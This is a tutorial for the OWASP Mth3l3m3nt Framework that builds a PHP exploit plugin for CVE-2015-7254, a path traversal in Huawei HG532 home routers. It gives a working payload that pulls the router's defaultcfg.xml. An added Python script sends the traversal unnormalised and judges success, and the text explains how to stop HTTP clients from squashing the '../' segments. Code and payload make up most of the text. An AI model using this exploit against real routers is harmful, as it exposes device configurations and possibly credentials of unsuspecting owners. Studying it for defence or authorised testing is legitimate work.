Developing LFI Plugins (Exploits) Deprecated
# Developing LFI Plugins
Suppose you want to add a new attack, either an LFI (Local File Inclusion) or an RFI (Remote File Inclusion). The Local And Remote File Inclusion ("Larfi") class in the OWASP Mth3l3m3nt Framework makes this straightforward.
For this walkthrough we develop an LFI plugin for CVE-2015-7254, a directory traversal in Huawei home routers. It affects the Huawei HG532e, HG532n and HG532s.
## Developing the CVE-2015-7254 Exploit
To develop an exploit we add it to the https://github.com/alienwithin/OWASP-mth3l3m3nt-framework/blob/master/framework/controller/lfiplugins.php file, the controller from which it is invoked.
The steps are:
- Create a function to hold the plugin.
- Create an instance of the Larfi class.
- Choose the type of LFI exploit to add; Larfi currently supports cookie-based injection (payload sent via POST) and URI-based injection (payload sent via GET).
- Define the parameters for that exploit type.
- Add a navigation menu entry so the plugin can be found in the interface.
First we create the function that will hold the plugin; ours is called "huawei_lfi". The function needs items from the base framework, so it receives an instance of it, \Base $f3. Through the $f3 object we reach the HIVE, the in-memory array in which the framework keeps its variables as key/value pairs; a value stored in the HIVE is globally available to every class and method in the application. See http://fatfreeframework.com/base#TheHive for details.
```php
public function huawei_lfi(\Base $f3){
    /*
    Code will come here
    */
}
```
We also need a new instance of the Larfi class so that its functions are available while writing the exploit. The instance is created inside our function, as shown below: through the variable $lfi we can reach the functions of the Larfi class.
```php
$lfi=new Larfi();
```
Next we give the exploit a title so it can be told apart from the others when running attacks. Ours is: HUAWEI LFI (cve-2015-7254) Huawei HG532e, HG532n, & HG532s
```php
$f3->set('exploit_title', 'HUAWEI LFI (cve-2015-7254) Huawei HG532e, HG532n, & HG532s');
```
We go through $f3 because exploit_title is stored in the HIVE for our view. We also need to give the interface a template; for LFI plugins the existing lfi_page.html template can be reused as is.
```php
$this->response->data['SUBPART'] = 'lfi_page.html';
```
After this we are ready to write the exploit itself.
According to the documentation of the vulnerability it is exploited through the URI, so we use the uri_based_lfi function, which takes three parameters:
- $blankurl => true when the URL field was submitted without a value; used to reject blank targets.
- $url => the URL of the target to attack.
- $payload => the attack string appended to the URL before the request is sent.
The function must then return a value indicating success or failure, so we return the result of uri_based_lfi called with our parameters. In our case the exploit tries to download the router's configuration file. Note that the payload starts with the port (37215), so the URL submitted in the form must end with the target's host, e.g. http://192.0.2.1, for the concatenation to form a valid request.
```php
$blankurl=$f3->devoid('POST.url');
$url=$f3->get('POST.url');
$payload=":37215/icon/../../../etc/defaultcfg.xml";
return $this->uri_based_lfi($blankurl,$url,$payload);
```
At this point the exploit already has a working interface. Your function should look like this:
```php
public function huawei_lfi(\Base $f3){
    // Larfi instance: the class that implements the LFI/RFI helpers
    $lfi=new Larfi();
    // Title shown in the interface; stored in the HIVE for the view
    $f3->set('exploit_title', 'HUAWEI LFI (cve-2015-7254) Huawei HG532e, HG532n, & HG532s');
    // Reuse the stock LFI template
    $this->response->data['SUBPART'] = 'lfi_page.html';
    // True when the form was submitted without a target URL
    $blankurl=$f3->devoid('POST.url');
    $url=$f3->get('POST.url');
    // Traversal appended to the submitted URL; the port is part of the payload
    $payload=":37215/icon/../../../etc/defaultcfg.xml";
    return $this->uri_based_lfi($blankurl,$url,$payload);
}
```
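The plugin above delegates the actual request to Larfi's uri_based_lfi. What such a helper has to get right is shown in the following stand-alone Python example, which is added here and is not code from the Mth3l3m3nt project; the function names, the `<?xml` success marker and the FakeConnection stand-in are assumptions made for the illustration. It reproduces the blank-URL check and the URL + payload concatenation from the plugin, sends the request with http.client (which puts the path on the wire verbatim), classifies the response, and shows what a client that squashes dot segments would send instead.

```python
# Added example, not code from the Mth3l3m3nt project: a stand-alone sketch of
# what a URI-based LFI plugin delegates to a helper such as uri_based_lfi().
# Function names, the success marker and FakeConnection are assumptions.
import posixpath
from http.client import HTTPConnection
from urllib.parse import urlsplit

# Payload from the page; the port is part of the payload, so the submitted
# target must end with the host (scheme://host).
HUAWEI_PAYLOAD = ":37215/icon/../../../etc/defaultcfg.xml"

# Assumed marker: the target file is an XML config, so a 200 response whose
# body starts with an XML declaration is treated as a hit.
CONFIG_MARKER = b"<?xml"


def build_attack_url(url, payload):
    """Mirror the $blankurl check and the URL + payload concatenation."""
    if url is None or not url.strip():
        raise ValueError("target URL is blank")
    url = url.strip()
    if "://" not in url:
        url = "http://" + url
    if payload.startswith(":") and urlsplit(url).port is not None:
        raise ValueError("payload carries its own port; submit scheme and host only")
    return url.rstrip("/") + payload


def squashed_path(path):
    """What a client that removes dot segments (curl without --path-as-is,
    urllib3/requests) would actually put on the wire."""
    return posixpath.normpath(path)


def fetch_raw(attack_url, connection_factory=HTTPConnection, timeout=5):
    """GET the attack URL with http.client, which sends the request path
    verbatim so the ../ segments reach the target. Returns (status, body, path)."""
    parts = urlsplit(attack_url)
    raw_path = parts.path + ("?" + parts.query if parts.query else "")
    conn = connection_factory(parts.hostname, parts.port or 80, timeout=timeout)
    try:
        conn.request("GET", raw_path)
        resp = conn.getresponse()
        return resp.status, resp.read(), raw_path
    finally:
        conn.close()


def classify(status, body):
    """Turn the HTTP response into the verdict the interface would display."""
    if status != 200:
        return "not vulnerable"
    return "vulnerable" if body.lstrip().startswith(CONFIG_MARKER) else "unknown"


def run_uri_based_lfi(url, payload, connection_factory=HTTPConnection):
    attack_url = build_attack_url(url, payload)
    status, body, raw_path = fetch_raw(attack_url, connection_factory)
    return {"attack_url": attack_url, "raw_path": raw_path,
            "status": status, "verdict": classify(status, body)}


class _FakeResponse:
    def __init__(self, status, body):
        self.status, self._body = status, body

    def read(self):
        return self._body


class FakeConnection:
    """Constructed stand-in for HTTPConnection so the example runs offline.
    It only 'leaks' the config when the traversal arrives un-normalised;
    a squashed /etc/defaultcfg.xml request gets a 404 like a patched device."""
    def __init__(self, host, port=80, timeout=None):
        self.host, self.port, self._path = host, port, None

    def request(self, method, path, body=None, headers=None):
        self._path = path

    def getresponse(self):
        if self._path == "/icon/../../../etc/defaultcfg.xml":
            return _FakeResponse(200, b'<?xml version="1.0"?><config>constructed</config>')
        return _FakeResponse(404, b"")

    def close(self):
        pass


if __name__ == "__main__":
    result = run_uri_based_lfi("192.0.2.1", HUAWEI_PAYLOAD, FakeConnection)
    print(result)
    print("squashed path a normalising client would send:", squashed_path(result["raw_path"]))
```

The last function is the caveat to keep in mind when porting a plugin like this to another HTTP client: libcurl squashes `../` segments unless CURLOPT_PATH_AS_IS (curl's --path-as-is) is set, and urllib3, and therefore requests, normalises dot segments in the path as well, so the traversal never reaches the router and the plugin reports a false negative against a vulnerable device.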
Assuming the application is hosted at http://attacker.google.com/mth, the function is already reachable at:
http://attacker.google.com/mth/cnc/lfi/huawei_lfi
It is better, though, to register it in the interface so that the URI does not have to be remembered. We add an entry to the Larfi layout so that it appears in the navigation menu:
```html
<a href="cnc/lfi/huawei_lfi" class="list-group-item{{(@PARAMS.0=='cnc/lfi/huawei_lfi'||@PARAMS.0=='/cnc/lfi/huawei_lfi'?' active':'') }}">Huawei LFI</a>
```
That's it, you're done. If everything worked, the exploit appears in the interface as shown below:
Developed by Munir Njiru